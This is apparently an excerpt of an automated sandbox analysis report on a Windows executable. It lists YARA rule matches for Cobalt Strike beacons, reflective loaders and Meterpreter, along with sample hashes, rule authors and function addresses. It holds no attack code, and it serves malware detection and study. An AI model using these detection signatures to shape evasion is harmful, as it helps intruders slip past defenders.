          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007E2078 CreateProcessWithLogonW,0_2_007E2078
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0076916C0_2_0076916C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007819280_2_00781928
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007859140_2_00785914
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B29800_2_007B2980
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007812640_2_00781264
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078AAB00_2_0078AAB0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B2B780_2_007B2B78
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007803740_2_00780374
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007703340_2_00770334
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B2BD80_2_007B2BD8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B2BC80_2_007B2BC8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078239C0_2_0078239C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078C3970_2_0078C397
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B2C400_2_007B2C40
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B2C080_2_007B2C08
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0077F5A80_2_0077F5A8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0076CE3C0_2_0076CE3C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078E6000_2_0078E600
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007696800_2_00769680
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078C6800_2_0078C680
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_00776F380_2_00776F38
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078CFF00_2_0078CFF0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_0078B7B00_2_0078B7B0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D01A80_2_007D01A8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BDA3C0_2_007BDA3C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DF2000_2_007DF200
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BA2800_2_007BA280
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DD2800_2_007DD280
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C7B380_2_007C7B38
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DDBF00_2_007DDBF0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DC3B00_2_007DC3B0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B9D6C0_2_007B9D6C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D25280_2_007D2528
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D65140_2_007D6514
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C867C0_2_007C867C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D1E640_2_007D1E64
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DB6B00_2_007DB6B0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D0F740_2_007D0F74
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C0F340_2_007C0F34
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007D2F9C0_2_007D2F9C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007DCF970_2_007DCF97
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
